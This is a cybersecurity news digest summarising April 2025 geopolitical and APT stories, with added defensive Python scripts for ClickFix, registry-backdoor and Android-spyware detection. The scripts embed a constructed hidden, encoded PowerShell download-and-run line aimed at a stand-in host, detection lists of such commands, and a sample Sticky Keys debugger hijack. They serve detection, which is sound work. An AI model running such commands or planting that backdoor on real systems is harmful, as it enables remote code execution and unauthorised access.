Saturday, Apr 19, 2025 // (IG): BB // GITHUB // SN R&D
Ukraine Sanctions Chinese Firms Linked to Russian Missile Production
Bottom Line Up Front (BLUF): Ukraine has imposed sanctions on three Chinese companies allegedly manufacturing Russian Iskander missiles. The move follows President Zelenskyy’s public accusations that Chinese firms are supplying weapons and dual-use technologies to Russia, despite Beijing’s continued claims of neutrality in the ongoing war.
Analyst Comments: This marks a significant diplomatic escalation, signaling Ukraine’s willingness to confront China over its perceived support for Moscow’s military efforts. The naming of Chinese firms in missile production highlights the shifting nature of modern supply chains, where civilian and military components increasingly overlap. While Ukraine’s action is largely symbolic in isolation, it could trigger broader sanctions coordination with Western allies or deepen existing trade tensions. China's response will likely seek to maintain strategic ambiguity while avoiding confrontation with either side.
FROM THE MEDIA: Ukraine sanctioned three Chinese companies—Beijing Aviation and Aerospace Xianghui Technology, Rui Jin Machinery, and Zhongfu Shenying Carbon Fiber Xining—citing their involvement in the supply chain for Russian Iskander missiles. This follows Ukrainian President Volodymyr Zelenskyy's accusation that Chinese entities are providing artillery, gunpowder, and even producing weapons within Russia. China's Foreign Ministry rejected the allegations as "groundless," reiterating its position of neutrality. The announcement came shortly after an Iskander missile strike on Kharkiv killed one person and injured over 100. Zelenskyy also claimed Chinese nationals have fought on Russia’s side in the war, a charge Beijing has not publicly addressed in detail.
READ THE STORY: Reuters
Florida Encryption Bill Sparks National Privacy and Security Concerns
Bottom Line Up Front (BLUF): Florida lawmakers have advanced a bill mandating encryption backdoors for law enforcement access on social media platforms, reigniting longstanding cybersecurity debates. The legislation also bans disappearing messages in minors’ accounts and forces platforms to enable parental access, raising alarms from digital rights advocates and security experts.
Analyst Comments: Requiring providers to create backdoors undermines end-to-end encryption—a cornerstone of secure communication—and opens the door to exploitation by malicious actors. While framed as a child protection measure, the broader implications mirror global efforts to weaken encryption under regulatory pressure. This law may face immediate legal challenges if passed and further polarize the national encryption debate.
FROM THE MEDIA: Sponsored by Florida state senator Blaise Ingoglia, the Social Media Use by Minors bill has passed committee and heads to the state Senate. It requires social media companies to offer decryption mechanisms when presented with a subpoena and prohibits disappearing messages in minors’ accounts. The bill also compels platforms to create tools allowing parents to access their children’s accounts. Critics argue the law would compromise the security of all users, as backdoors inherently weaken encryption protections. Similar legislative efforts have recently surfaced in the UK and EU, indicating a coordinated trend toward state-accessible encryption.
READ THE STORY: Wired
House Report Flags DeepSeek AI as Security Threat, Recommends Tighter Export Controls
Bottom Line Up Front (BLUF): A House investigation into Chinese AI firm DeepSeek warns the platform poses significant national security and data privacy risks due to its integration with China’s surveillance infrastructure. The report urges enhanced export controls, federal procurement bans, and proactive tracking of emerging adversarial tech firms.
Analyst Comments: DeepSeek’s emergence exemplifies a growing challenge to U.S. dominance in AI innovation, fueled by state-backed funding, strategic infrastructure access, and alleged model replication. The report underscores how resourceful Chinese firms can circumvent sanctions and leverage tightly integrated ecosystems for rapid AI advancement. If substantiated, claims of data funneling to Chinese military-linked telecoms like China Mobile heighten concerns of intelligence exploitation. To avoid strategic surprise, Washington’s policy response must balance containment with innovation acceleration.
FROM THE MEDIA: The House Select Committee on the CCP released a report on April 17, revealing how DeepSeek—a Chinese AI firm with ties to High-Flyer Quant and China Mobile—leveraged $420 million in funding and 60,000 NVIDIA GPUs to develop its R1 model rapidly. The model's low training costs ($6M) and high performance shocked U.S. markets earlier this year. The report alleges DeepSeek illegally extracted data from U.S. AI models using aliases and unregulated access, while routing user data through Chinese military-linked infrastructure. It recommends export control expansion, federal procurement bans on Chinese AI tools, and improved early-stage monitoring of emerging tech threats.
READ THE STORY: CYBERSCOOP
Zuckerberg Faces Antitrust Trial as Old Emails Expose Meta's Acquisition Strategy
Bottom Line Up Front (BLUF): Mark Zuckerberg is defending Meta in a high-stakes antitrust trial brought by the U.S. Federal Trade Commission (FTC), which alleges the company illegally maintained a monopoly through strategic acquisitions of Instagram and WhatsApp. Emails from Zuckerberg describing the deals as methods to “neutralize” competition have become central to the case.
Analyst Comments: This trial represents a pivotal moment for U.S. antitrust enforcement against Big Tech. The FTC aims to prove that Meta’s acquisitions were not just aggressive business moves but part of an illegal strategy to stifle competition. However, the agency must also convince the court that Meta currently holds monopoly power in a narrowly defined “personal social networking” market—a definition that excludes rivals like TikTok. If successful, the FTC could force Meta to divest its platforms, reshaping the tech landscape. If not, it may limit regulatory efforts under existing antitrust laws.
FROM THE MEDIA: In federal court testimony this week, Zuckerberg emphasized TikTok’s rapid rise as a major competitor, countering claims that Meta maintains a dominant market position. At issue are Meta’s acquisitions of Instagram (2012) and WhatsApp (2014), which the FTC claims were part of a deliberate campaign to eliminate competition. Internal emails submitted as evidence include Zuckerberg admitting the Instagram deal could “neutralize a competitor” and that WhatsApp posed a strategic threat. A 2018 email even acknowledged a potential forced spinout due to antitrust pressure. While the FTC seeks to define a monopoly around Meta’s control of social networking among friends and family, Meta argues that competition with TikTok proves otherwise.
READ THE STORY: Reuters
DOGE’s Centralized Immigrant Surveillance Database Raises Civil Liberty Fears
Bottom Line Up Front (BLUF): The Department of Government Efficiency (DOGE), under Elon Musk’s leadership, is reportedly building a centralized database at DHS to surveil immigrants by integrating data from DHS, SSA, IRS, and state voter rolls. Experts warn the system could be used to track individuals in real time and facilitate mass immigration enforcement.
Analyst Comments: Constructing a unified federal data lake to track immigrants represents a seismic shift in government surveillance norms. By centralizing previously siloed datasets—including biometric, financial, and voter information—DOGE’s system raises significant privacy, ethical, and cybersecurity concerns. Such an architecture creates a high-value target for exploitation and misuse, especially amid diminished oversight following the gutting of DHS’s civil rights offices. This development may erode trust in digital government systems and disproportionately impact lawful residents and naturalized citizens if unchecked.
FROM THE MEDIA: According to a WIRED investigation, DOGE operatives are rapidly uploading sensitive records to a DHS data lake, including USCIS immigration case files, IRS tax data, Social Security records, and biometric information. Voting data from Florida and Pennsylvania is reportedly also being cross-referenced. Officials and whistleblowers expressed alarm, describing the system as a “panopticon” capable of near-instantaneous surveillance. The database is being built using platforms like Palantir’s Foundry, with engineers reportedly plotting a “mega API” to enable seamless data access across agencies. Critics warn this initiative bypasses privacy protections, citing recent deportation errors and lack of inter-agency safeguards.
READ THE STORY: Wired
Ukraine’s Grid Under Fire: European Energy Security Faces New Geopolitical Test
Bottom Line Up Front (BLUF): As Russia continues targeting Ukraine’s energy infrastructure, the consequences are rippling across Europe. The EU’s decision to synchronize Ukraine with the continental grid has ensured essential services remain operational during attacks—but it also exposes the broader European energy system to grid instability and rising costs.
Analyst Comments: Russia's targeting of Ukrainian energy infrastructure is as much about pressuring Kyiv as it is about testing Europe’s interconnected energy resilience. The integration of Ukraine into the EU grid—a strategic success—has created new systemic dependencies, making regional blackouts or cost spikes increasingly likely. The EU must harden its grid with infrastructure and cyber defenses, particularly against state-backed adversaries like Russia. The call for a digital, decentralized grid powered by renewables is not just about climate goals—it's a critical national security imperative.
FROM THE MEDIA: Ukraine’s rapid grid synchronization with continental Europe in early 2022 has enabled the country to maintain power even after significant Russian missile strikes. However, it has also meant that fluctuations, like frequency drops caused by destroyed substations, are felt across the continent, from Paris to Budapest. Bordering countries like Poland, Slovakia, and Romania bear the brunt, balancing the system at a higher cost. Experts warn that while some EU leaders contemplate resuming Russian energy imports post-conflict, the real solution lies in building a self-reliant, renewable, and cyber-resilient grid. Key recommendations include reinforcing interconnections, advancing grid digitization, and accelerating energy market integration across the bloc.
READ THE STORY: CE ENERGY
MP Materials Halts China Rare Earth Sales Amid Escalating Trade War
Bottom Line Up Front (BLUF): U.S.-based MP Materials has suspended rare earth concentrate exports to China following Beijing’s 125% retaliatory tariffs, disrupting a key revenue stream. The move highlights vulnerabilities in the U.S. rare earth supply chain as the company accelerates domestic refining and magnet production.
Analyst Comments: The halt in MP Materials' China sales underscores the geopolitical fragility of critical mineral supply chains, particularly in the rare earth sector, where China dominates processing. While MP has made strategic strides toward domestic independence, the lack of U.S. capability to refine heavy rare earths, essential for defense and electronics, remains a glaring gap. In the short term, this will financially strain MP, but in the long term, it may accelerate U.S. efforts to onshore rare earth processing and reduce reliance on adversarial nations.
FROM THE MEDIA: MP Materials, the linchpin of America’s rare earth ambitions, has stopped shipping its output to Chinese partner Shenghe Resources due to newly imposed 125% Chinese tariffs on U.S. goods. These exports accounted for 80% of MP’s $204 million in 2024 revenue. The company, which owns the Mountain Pass mine in California, is now processing about half its output domestically and selling it outside of China. However, MP cannot yet separate heavy rare earths—key elements for high-performance magnets used in F-35 jets and other critical systems. China’s recent export controls on these materials have further constrained global access, exposing the U.S. to potential supply chain shocks.
READ THE STORY: FT
State-Sponsored Hackers Adopt ClickFix Technique for Global Espionage Campaigns
Bottom Line Up Front (BLUF): Threat actors from North Korea, Iran, and Russia have incorporated the ClickFix attack method, originally used by cybercriminals, into advanced cyber-espionage operations. The technique uses fake system dialogues to socially engineer victims into running malicious commands themselves, which then deliver remote access tools and enable data theft.
Analyst Comments: The pivot from cybercrime to state-sponsored use of ClickFix underscores how quickly effective techniques are absorbed into APT toolkits. Its reliance on user interaction rather than software exploits allows adversaries to bypass many traditional defenses. With its recent application in campaigns against defense, government, and research entities, organizations should urgently reinforce user awareness training and behavior-based endpoint detection. The convergence of espionage and cybercrime tactics signals an increasingly blurred line in attribution and intent.
FROM THE MEDIA: Proofpoint researchers report that from late 2024 to early 2025, actors such as North Korea’s TA427, Iran’s TA450 (MuddyWater), and Russia-linked TA422 (APT28) and UNK_RemoteRogue adopted ClickFix in targeted campaigns. TA427 used fake diplomatic meeting invites to lure think tank personnel into installing QuasarRAT. TA450 impersonated Microsoft in phishing emails to install Level RMM software in a campaign that targeted 39 organizations. Russian actors used phishing lures mimicking Google Docs and online surveys to deploy PowerShell payloads, SSH tunnels, and Metasploit. Because the victim types or pastes the command into a Run dialog or terminal, no exploit is required and the malicious process is spawned by the user's own shell, a path many conventional security layers do not inspect.
READ THE STORY: GBhackers
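The execution chain described above leaves a characteristic trail on the endpoint. The following is an added example, not code from the Proofpoint research or the article: a small triage pass over Sysmon-style process-creation records and RunMRU registry values. It keys on the two signals a ClickFix paste produces, an interpreter started directly by explorer.exe (the Run dialog host) with download-and-run or encoded-command content, and a copy of the pasted text under HKCU\...\Explorer\RunMRU. The sample records, the encoded payload and the hostname lure.example.invalid are constructed.

```python
"""
Added example (not from the Proofpoint report or the article): triage of
Sysmon-style process-creation records and RunMRU values for the execution
chain a ClickFix lure produces. Sample data below is constructed.
"""
import base64
import re
from typing import Optional

# Interpreters and downloaders a pasted ClickFix one-liner typically launches.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
# The Run dialog is hosted by explorer.exe, so it is the parent of a pasted command.
USER_SHELL_PARENTS = {"explorer.exe"}
# Content markers common in ClickFix payloads (download-and-run, hidden window, encoding).
SUSPICIOUS_TOKENS = ("-enc", "-encodedcommand", "iex", "invoke-expression",
                     "downloadstring", "invoke-webrequest", "iwr ", "irm ",
                     "frombase64string", "mshta http", "-w hidden",
                     "-windowstyle hidden", "http://", "https://")

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def _is_interpreter(path: str) -> bool:
    name = _basename(path.strip('"'))
    return name in INTERPRETERS or f"{name}.exe" in INTERPRETERS

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -e/-ec/-enc/-EncodedCommand argument (base64 of UTF-16LE)."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_process_event(event: dict) -> list:
    """Return the reasons a process-creation event looks like ClickFix; [] if benign."""
    if not _is_interpreter(event.get("Image", "")):
        return []
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    content = ["token " + t.strip() for t in SUSPICIOUS_TOKENS if t in cmd.lower()]
    decoded = decode_encoded_command(cmd)
    if decoded:
        content.append("encoded command decodes to: " + decoded)
    # Require both signals (user-shell parent AND download/obfuscation content)
    # so routine admin PowerShell launched from a console host is not flagged.
    if parent in USER_SHELL_PARENTS and content:
        return [f"{_basename(event['Image'])} spawned by {parent}"] + content
    return []

def suspicious_runmru(values: dict) -> dict:
    """RunMRU strings end in '\\1'; return the entries that look like pasted payloads."""
    hits = {}
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        first = cmd.split(" ", 1)[0]
        if _is_interpreter(first) and any(t in cmd.lower() for t in SUSPICIOUS_TOKENS):
            hits[name] = cmd
    return hits

# Constructed samples: one ClickFix-style paste and one routine admin launch.
PAYLOAD = "iex (irm http://lure.example.invalid/fix.ps1)"   # constructed lure, not a real C2
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]
SAMPLE_RUNMRU = {"a": f"powershell -w hidden -enc {ENCODED}\\1",
                 "b": "notepad\\1", "MRUList": "ab"}

def triage(events=SAMPLE_EVENTS, runmru=SAMPLE_RUNMRU) -> dict:
    flagged = [(e["CommandLine"], score_process_event(e)) for e in events]
    return {"events": [f for f in flagged if f[1]], "runmru": suspicious_runmru(runmru)}

if __name__ == "__main__":
    result = triage()
    for cmd, reasons in result["events"]:
        print("PROCESS:", cmd[:60] + "...\n  " + "\n  ".join(reasons))
    for name, cmd in result["runmru"].items():
        print(f"RUNMRU {name}: {cmd[:60]}...")
```

The two-signal rule is deliberate: PowerShell under explorer.exe alone is common (shortcuts, right-click menus), and encoded commands alone are common in management tooling; it is the combination, plus the RunMRU copy of the pasted text, that distinguishes a ClickFix victim from an administrator.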
Flax Typhoon Expands Espionage Operations, Ties to Raptor Train Botnet Revealed
Bottom Line Up Front (BLUF): Flax Typhoon, a Chinese state-sponsored APT group, has expanded its cyber-espionage campaign beyond Taiwan to include targets in North America, Africa, and Southeast Asia. The group uses stealthy techniques, including SoftEther VPNs, living-off-the-land binaries (LOLBins), and customized web shells to maintain persistent access. It is now linked to the large-scale Raptor Train botnet operation.
Analyst Comments: Flax Typhoon's ability to maintain persistent, low-noise access via modified Windows features and VPN tunnelling signals high operational maturity. The confirmed overlap with Raptor Train, a stealthy botnet exploiting IoT and enterprise devices globally, suggests espionage and botnet infrastructure are being integrated to support Chinese strategic objectives. Continued targeting of U.S. and allied systems indicates sustained interest in diplomatic, technological, and geopolitical intelligence.
FROM THE MEDIA: First detected in 2021, Flax Typhoon (also known as RedJuliett and Ethereal Panda) targets sectors aligned with Chinese state interests—especially in Taiwan—while expanding globally to include the U.S., South Korea, and African countries such as Djibouti and Kenya. The group uses exploits against public-facing servers and deploys web shells (e.g., China Chopper, AntSword) to maintain minimal yet effective footholds. Persistence is achieved by disabling RDP Network Level Authentication and abusing the Windows Sticky Keys feature for privilege escalation. SoftEther VPNs renamed to mimic legitimate Windows binaries (e.g., conhost.exe) obscure their command and control. Recent FBI investigations connect the group to the Raptor Train botnet, which has compromised over 260,000 devices globally and includes Mirai-variant malware targeting IoT.
READ THE STORY: SOCRADAR
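Each of the three tradecraft items above (the Sticky Keys hijack, the NLA change, and the renamed VPN binary) is visible in the registry. The following is an added example, not code from the SOCRadar report or from Flax Typhoon's tooling: an offline audit of a Windows registry export (.reg text) that flags an Image File Execution Options debugger on an accessibility binary, RDP Network Level Authentication switched off, and a service whose executable borrows a Windows system-process name such as conhost.exe but runs from outside System32. The export below is constructed; the service name ConhostSvc and the paths are assumptions.

```python
"""
Added example (not from the SOCRadar report or Flax Typhoon's tooling): audit a
.reg export for Sticky Keys/IFEO hijacks, disabled RDP NLA and system-named
binaries running outside System32. The export below is constructed.
"""
import re

# Binaries reachable from the logon screen; an IFEO "Debugger" on any of them
# yields a SYSTEM shell without credentials (the classic Sticky Keys backdoor).
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}
# Names an attacker renames tooling to so it blends into a process list.
SYSTEM_PROCESS_NAMES = {"conhost.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                        "dllhost.exe", "wininit.exe"}
SYSTEM32_PREFIXES = ("c:\\windows\\system32\\", "%systemroot%\\system32\\")

def parse_reg(text: str) -> dict:
    """Parse the subset of .reg syntax needed here: [keys], "name"="string", dword."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"(.+?)"=(.*)$', line)
        if m and current is not None:
            name, raw = m.groups()
            if raw.startswith('"') and raw.endswith('"'):
                value = raw[1:-1].replace("\\\\", "\\")   # .reg doubles backslashes
            elif raw.lower().startswith("dword:"):
                value = int(raw[6:], 16)
            else:
                value = raw
            keys[current][name] = value
    return keys

def _exe_path(image_path: str) -> str:
    """Strip quoting and arguments from a service ImagePath, keeping the .exe path."""
    m = re.match(r'\s*"?([^"]+?\.exe)', image_path, re.I)
    return m.group(1) if m else image_path

def audit(keys: dict) -> list:
    findings = []
    for key, values in keys.items():
        k = key.lower()
        lv = {n.lower(): v for n, v in values.items()}
        if "\\image file execution options\\" in k:
            target = k.rsplit("\\", 1)[-1]
            if target in ACCESSIBILITY_BINARIES and "debugger" in lv:
                findings.append(f"IFEO debugger hijack: {target} -> {lv['debugger']}")
        if k.endswith("\\winstations\\rdp-tcp"):
            if lv.get("userauthentication") == 0:
                findings.append("RDP NLA disabled (UserAuthentication=0)")
            if lv.get("securitylayer") == 0:
                findings.append("RDP SecurityLayer=0 (legacy RDP security, no TLS)")
        if "\\services\\" in k and "imagepath" in lv:
            path = _exe_path(str(lv["imagepath"]))
            name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
            if name in SYSTEM_PROCESS_NAMES and not path.lower().startswith(SYSTEM32_PREFIXES):
                findings.append(f"service {key.rsplit(chr(92), 1)[-1]} runs {name} outside System32: {path}")
    return findings

def audit_reg_text(text: str) -> list:
    return audit(parse_reg(text))

# Constructed export: three malicious entries and one legitimate service for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
"SecurityLayer"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ConhostSvc]
"ImagePath"="C:\\ProgramData\\Microsoft\\conhost.exe /run"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache]
"ImagePath"="%SystemRoot%\\System32\\svchost.exe -k NetworkService"
'''

if __name__ == "__main__":
    for finding in audit_reg_text(SAMPLE_REG):
        print("FINDING:", finding)
```

Usage: export the relevant hives with `reg export` (or parse a collected SYSTEM/SOFTWARE hive with your forensic tool of choice into the same text form) and run the script against the file; the Dnscache entry shows that a genuine svchost.exe under System32 is not reported.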
SpyMax Android Spyware Exploits Accessibility Services for Full Remote Surveillance
Bottom Line Up Front (BLUF): A newly discovered variant of SpyMax/SpyNote Android spyware is targeting Chinese-speaking users in China and Hong Kong by masquerading as a legitimate app from the Chinese Prosecutor’s Office. It abuses Android Accessibility Services to gain full control over infected devices, enabling real-time surveillance, data exfiltration, and remote command execution.
Analyst Comments: This spyware campaign illustrates the increasingly sophisticated use of social engineering and system-level abuse in mobile threats. By combining a legitimate-seeming interface with deep access via Accessibility Services, attackers bypass many traditional defenses. Its use of HTTPS exfiltration, runtime API execution, and stealthy modular architecture mirrors advanced persistent threat (APT) tactics. Enterprises should incorporate mobile threat detection into broader endpoint security strategies and enforce strict MDM policies to mitigate such risks.
FROM THE MEDIA: Perplexity researchers uncovered this spyware campaign on April 4, 2025, distributing an APK named “检察院” through spoofed official app stores. The malware’s architecture allows control of the device camera, microphone, and screen-based behavior, and can issue commands using Runtime APIs. It collects SMS, clipboard data, GPS location, and other sensitive information, encrypts the data, and deletes traces after transmission. The spyware also features a fake Accessibility settings interface to trick users into enabling dangerous permissions. Command and control activity has been linked to the IP 165.154.110.64, with indicators including ICMP pings and encrypted transfer behavior.
READ THE STORY: GBhackers
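The capability mix described above (an Accessibility Service for UI control, plus SMS, microphone, camera and location access) is declared in the app's manifest before a single line of malicious code runs. The following is an added example, not code from the researchers' analysis or the SpyMax sample: a static triage of a decoded AndroidManifest.xml that reports the accessibility services an app registers and the surveillance permissions it requests, and flags the combination. The manifest is constructed, and the package name is an assumption; in practice the input is the manifest extracted with apktool or a similar decoder.

```python
"""
Added example (not from the researchers' analysis or the SpyMax sample): flag
the SpyMax capability profile in a decoded AndroidManifest.xml. The manifest
below is constructed.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def _a(attr: str) -> str:
    """Qualified name for an android: attribute."""
    return f"{{{ANDROID_NS}}}{attr}"

# Permissions that give a spyware implant its collection and stealth capability.
SURVEILLANCE_PERMS = {
    "android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_CONTACTS",
    "android.permission.READ_CALL_LOG", "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.REQUEST_INSTALL_PACKAGES",
}

def accessibility_services(root) -> list:
    """Services bound with BIND_ACCESSIBILITY_SERVICE and the matching intent-filter action."""
    found = []
    for svc in root.iter("service"):
        if svc.get(_a("permission")) != "android.permission.BIND_ACCESSIBILITY_SERVICE":
            continue
        actions = {a.get(_a("name")) for a in svc.iter("action")}
        if "android.accessibilityservice.AccessibilityService" in actions:
            found.append(svc.get(_a("name")))
    return found

def triage_manifest(xml_text: str, min_perms: int = 3) -> dict:
    root = ET.fromstring(xml_text)
    perms = {p.get(_a("name")) for p in root.iter("uses-permission")}
    risky = sorted(perms & SURVEILLANCE_PERMS)
    services = accessibility_services(root)
    return {
        "package": root.get("package"),
        "accessibility_services": services,
        "surveillance_permissions": risky,
        # Accessibility plus several surveillance permissions in one app is the
        # SpyMax profile; a lone accessibility service (screen readers) is not.
        "verdict": "spyware-profile" if services and len(risky) >= min_perms else "review",
    }

# Constructed manifest modelled on the lure described in the article (package name assumed).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.jcy.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="检察院">
    <activity android:name=".MainActivity"/>
    <service android:name=".svc.AccService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for k, v in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{k}: {v}")
```

This is a first-pass filter, not proof of malice: legitimate accessibility apps declare the same service, which is why the verdict requires the surveillance permissions as well, and a real implant may request permissions at runtime or hide behind a dropper, so a "review" result still warrants dynamic analysis.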
Chinese Mobile Interconnect Infrastructure Enables Global Surveillance via Legacy Protocols
Bottom Line Up Front (BLUF): Chinese state-owned telecom providers, including China Mobile, China Telecom, and China Unicom, are integral to global mobile interconnect infrastructure used by at least 60 operators in 35 countries. Their use of legacy signaling protocols like SS7 and Diameter exposes billions of global mobile users to surveillance, data interception, and espionage.
Analyst Comments: These legacy systems offer state-level adversaries opportunities for man-in-the-middle attacks, real-time location tracking, and content interception. Given China's cyber policy integration with military objectives, these interconnect pathways are strategic surveillance assets. Governments and telecom regulators must expedite secure signaling protocol upgrades and adopt transparent interconnection policies.
FROM THE MEDIA: Chinese telecom giants—including China Mobile International, China Telecom Global, and China Unicom Global—serve as backbone interconnect providers for global mobile traffic, facilitating voice, SMS, and data routing across borders. Their infrastructure depends on SS7 and Diameter signaling, which lack encryption and have known exploit vectors. These providers’ access allows interception of authentication tokens, call and message data, and device location. Despite being U.S. allies, countries such as Japan, South Korea, New Zealand, and Saudi Arabia are among those routing traffic through these providers. The U.S. Federal Communications Commission (FCC) is investigating whether these firms circumvent restrictions through unregulated operations. The national security risk stems from surveillance potential and the possibility of signaling-based cyberattacks, such as silent SMS injection and session hijacking.
READ THE STORY: Reuters // Android Central // iVerify
Raiffeisen Halts Russia Exit Amid Signs of U.S.-Russia Economic Rapprochement
Bottom Line Up Front (BLUF): Raiffeisen Bank International (RBI) has paused the sale of its Russian subsidiary, citing renewed U.S.-Russia political engagement and ongoing legal complications. Despite EU and U.S. pressure to divest from Russia following its 2022 invasion of Ukraine, shifting geopolitical signals have prompted a strategic reassessment.
Analyst Comments: The apparent softening of U.S. policy toward Moscow may give European entities like RBI renewed hope of maintaining commercial footholds in Russia without severe regulatory blowback. However, RBI remains exposed to reputational damage and financial risk, particularly as it appeals a €2bn Russian court ruling. The situation highlights how geopolitics and compliance regimes directly influence cross-border banking strategy.
FROM THE MEDIA: According to sources familiar with the matter, RBI paused its efforts to sell its Russian business in February 2025 as diplomatic engagement between Washington and Moscow appeared to thaw. The Austrian bank had previously faced mounting pressure from Western regulators to exit Russia but encountered legal roadblocks after a Russian court froze shares of its local unit and imposed €2bn in damages. Despite officially stating that the sale process remains “ongoing,” RBI acknowledged that the court freeze prevents execution of any transaction. The move comes as Trump’s envoy Steve Witkoff confirmed renewed U.S.-Russia discussions over “commercial opportunities.” RBI’s appeal is scheduled for April 24, with significant implications for the bank’s strategy and capital position.
READ THE STORY: FT
China Publicly Accuses NSA of Cyberattacks Amid Growing Digital Cold War
Bottom Line Up Front (BLUF): China has publicly named three alleged U.S. NSA operatives in connection with cyberattacks against its infrastructure during the 2025 Asian Winter Games, escalating a broader campaign to portray the U.S. as the aggressor in cyberspace. This comes weeks after the U.S. indicted 12 Chinese nationals for cyber espionage. Both nations leverage public attribution and narrative control as strategic tools in ongoing cyber and geopolitical tensions.
Analyst Comments: This tit-for-tat strategy appears less about legal reciprocity and more about information warfare, aligning with China's broader push for “cyber sovereignty.” By reframing itself as a victim and positioning the U.S. as a cyber aggressor, Beijing is attempting to influence global norms and secure ideological alignment with non-Western allies in forums like the ITU. This signals a broader contest over cyber operations and the governance and values that shape the global internet.
FROM THE MEDIA: In a rare act of attribution, Chinese state media named three alleged NSA operatives for cyber intrusions targeting the Asian Winter Games and key Chinese sectors. China also implicated the University of California and Virginia Tech as collaborators. The move follows recent U.S. indictments of Chinese hackers linked to campaigns against U.S. federal systems and critical infrastructure. Experts note that neither side will likely surrender named individuals, framing the episode as a cyber theater aimed at global audiences. Analysts suggest this plays into China's efforts to promote its cyber governance and control model, contrasting it with the U.S.’ intelligence-led approach. China’s strategy appears to reshape the international narrative to legitimize its domestic controls and export its authoritarian digital model.
READ THE STORY: Clearance Jobs
U.S. Cyber Defenses Weaken Under Trump as Disinformation Threats Escalate
Bottom Line Up Front (BLUF): Since President Trump’s return to office, key disinformation and cybersecurity programs have been dismantled, including task forces at the FBI, State Department, and CISA. This rollback has created an intelligence vacuum amid growing foreign information operations from adversaries like Russia and China.
Analyst Comments: The Trump administration’s disbanding of institutional cybersecurity and disinformation guardrails represents a strategic vulnerability at a time when influence operations are intensifying. Russia's Portal Kombat campaign targeting the F-35 program underscores how adversaries exploit reduced U.S. counter-efforts to shape global narratives and erode trust in defense systems. The shift from expert-driven security policy to loyalty-based decision-making may embolden foreign actors and further complicate cyber and information threat response coordination across agencies and allies.
FROM THE MEDIA: A New York Times investigation published April 18 reveals the systematic dismantling of U.S. disinformation countermeasures under the Trump administration. The FBI’s foreign influence task force, CISA’s anti-disinformation mission, and the State Department’s propaganda tracking team have all been shut down. Key cybersecurity leaders, including NSA and Cyber Command chief General Timothy Haugh, were fired. Analysts have observed an uptick in pro-Russian influence campaigns, including recent falsehoods about U.S. control over NATO’s F-35 jets. Officials warn that the absence of a coordinated disinformation defense will leave American firms and military projects increasingly exposed to foreign manipulation.
READ THE STORY: NYT
Mustang Panda Unleashes Advanced Malware Suite, Featuring EDR Evasion and New Keyloggers
Bottom Line Up Front (BLUF): Chinese state-backed APT Mustang Panda has deployed four new custom tools, enhancing its espionage capabilities. These include two keyloggers, a lateral movement proxy, and a kernel-level EDR evasion driver—part of a broader upgrade to its TTPs and malware arsenal.
Analyst Comments: The addition of kernel-level evasion tooling like SplatCloak, which removes the callbacks security products rely on to observe process and thread activity, marks an escalation in the sophistication of Chinese threat actors’ EDR evasion. Using FakeTLS for command-and-control further blurs detection boundaries and complicates threat hunting. Organizations in Southeast Asia and Western policy sectors should anticipate more resilient and prolonged intrusions.
